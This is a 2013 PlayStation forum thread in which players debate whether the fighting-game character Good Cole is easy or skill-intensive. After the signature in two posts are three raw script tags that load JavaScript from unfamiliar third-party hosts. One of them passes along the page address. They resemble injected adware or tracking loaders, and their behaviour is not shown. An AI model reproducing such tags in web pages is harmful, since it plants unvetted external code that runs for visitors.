Jan 28 2013
By: ItsLuigiTime Uncharted Territory 1087 posts

Changing opinions of Good Cole?

8 replies 300 views Edited Jan 28, 2013

For a while I remember a lot of people, including myself, praising Good Cole over his evil counterpart and sometimes even claiming him to be one of the most balanced characters in the game.

But I've noticed in these recent threads that people are starting to feel that Cole doesn't take as much skill and can easily take down certain characters.  I also notice that Good and Evil Cole now tend to be lumped together in that respect.  Good Cole used to be one of my most-used alts, but I really don't sway one way or the other anymore.  I'm just noticing a changing opinion of him.

Anyone know why that may be?  Are people just discovering new exploits with him?  Is he being used too much now?  Just curious.

Message 1 of 9 (300 Views)
0 Likes
Fender Bender
3009 posts

Re: Changing opinions of Good Cole?

Jan 28, 2013
I don't think he's very easy to use but he has a decent learning curve. I think people just get caught up in the Coles that spam grenades and make angry posts but in reality he just has an answer for almost everything. He can zone you, get up close if he needs to, and is probably has the best maneuverability around stages in the game.
[The YouTube Poser]

Message 2 of 9 (283 Views)
0 Likes
Hekseville Citizen
386 posts

Jan 28, 2013

He is a very strong character, of course, he is like the "balanced" version of evil cole, but still he has a lot of potential and yes, he doesn't require high execution to get a big reward

Message 3 of 9 (263 Views)
0 Likes
I Only Post Everything
1028 posts

Jan 28, 2013
There was a time where I thought the coles level 1 was one of the worst. Now that's Definetly not the case. Good cole is just very combo heavy. And evil cole, he's more of a hard hitter. It does take some skill to be able to pull off Coles intricate combos and to use evil Cole without having to rely on his GP set up.
Message 4 of 9 (247 Views)
0 Likes
Gaming Beast
2167 posts

Jan 29, 2013
It's less about him being easy to use (He's really not at all), but more about people finding out how good he actually is.

When someone asked me what the hardest thing about learning this character was, I answered knowing what tools to use in what situations to maximize your reward.

What I mean by this is that GC has an answer to just about everything. Hell, he usually has more than 1! The hard part is knowing which to use and adapting to it. For example I can combo people in the air, but depending how high off the ground they are I have to change my combo. Pretty much anywhere lower than double jump height I can AP burst, but depending on where you are in that area and what the move I started the combo with was, I have to combo differently. This basically forces you to learn this character inside and out if you want to compete with him.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 5 of 9 (170 Views)
0 Likes
Survivor
2138 posts

[ Edited ]
Jan 29, 2013

I think people are distinctly confusing people that either use Good Cole really well, with people that just spam the grenades, wait for people to get downright annoyed with the grenade spam and then have people rush to you...only to be hit with a lvl 1 they or better yet a Giga punch into a level 1.
yet
There are very few if any people that use Good Cole well and I have yet to come across any Evil Cole users that just chuck grenades from across the map wait for you to rush them then giga punch you into level 1.

To be honest I am not sure what the complaint on Good Cole is about, he is really REALLY under used. I think in the top 1000 of the leaderboards probably 2 maybe 3 people use him? As apposed to the hundreds of Kratos', Sly's and Raiden's I come across.

Pretty much every character with a sword has the range on Cole, on the ground at least,  his lightning tether makes taking to the sky against him risky business but any good player with a sword and decent mobility should in theory at least be able to give Cole a run for his money. Problem is though...Cole is faster than pretty much every character with a sword in the game. I would make reference to the grudge match thread but it seems to be a touchy subject. 

Message 6 of 9 (155 Views)
0 Likes
Uncharted Territory
1225 posts

[ Edited ]
Jan 29, 2013

He's been my main since day 1 and believe me, he takes skill. Of course you can spam grenades / bolts from a distance and get an easy super, but that's a problem of the enemy who is dumb and not aware of it. Don't pretend to win high level matches that way. Any good player won't let you camp.

About level 1, it has many hitconfirms, but they're nowhere near as easy/effective as Raiden, Heihachi, Evil Cole, FP, Toro... Level 2 is balanced, level 3 is mediocre outside FFA and small maps. His AP gain is not high, not low. He's balanced.

Spammy Coles are bad players and they will lose easily against good players. If you want to be competitive as Cole you have to use every single move he has, which cannot be said of many other characters.

Message 7 of 9 (143 Views)
Splicer
65 posts

Jan 29, 2013

Cole is easy to play nuff said 

Message 8 of 9 (107 Views)
0 Likes
Gaming Beast
2167 posts

Jan 29, 2013

vizionary2012 wrote:

I think people are distinctly confusing people that either use Good Cole really well, with people that just spam the grenades, wait for people to get downright annoyed with the grenade spam and then have people rush to you...only to be hit with a lvl 1 they or better yet a Giga punch into a level 1.
yet
There are very few if any people that use Good Cole well and I have yet to come across any Evil Cole users that just chuck grenades from across the map wait for you to rush them then giga punch you into level 1.

To be honest I am not sure what the complaint on Good Cole is about, he is really REALLY under used. I think in the top 1000 of the leaderboards probably 2 maybe 3 people use him? As apposed to the hundreds of Kratos', Sly's and Raiden's I come across.

Pretty much every character with a sword has the range on Cole, on the ground at least,  his lightning tether makes taking to the sky against him risky business but any good player with a sword and decent mobility should in theory at least be able to give Cole a run for his money. Problem is though...Cole is faster than pretty much every character with a sword in the game. I would make reference to the grudge match thread but it seems to be a touchy subject. 

Well, he's not so present in ranked (Not amazing in FFA IMO), but he is showing up a lot in the 1v1 scene.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 9 of 9 (82 Views)
0 Likes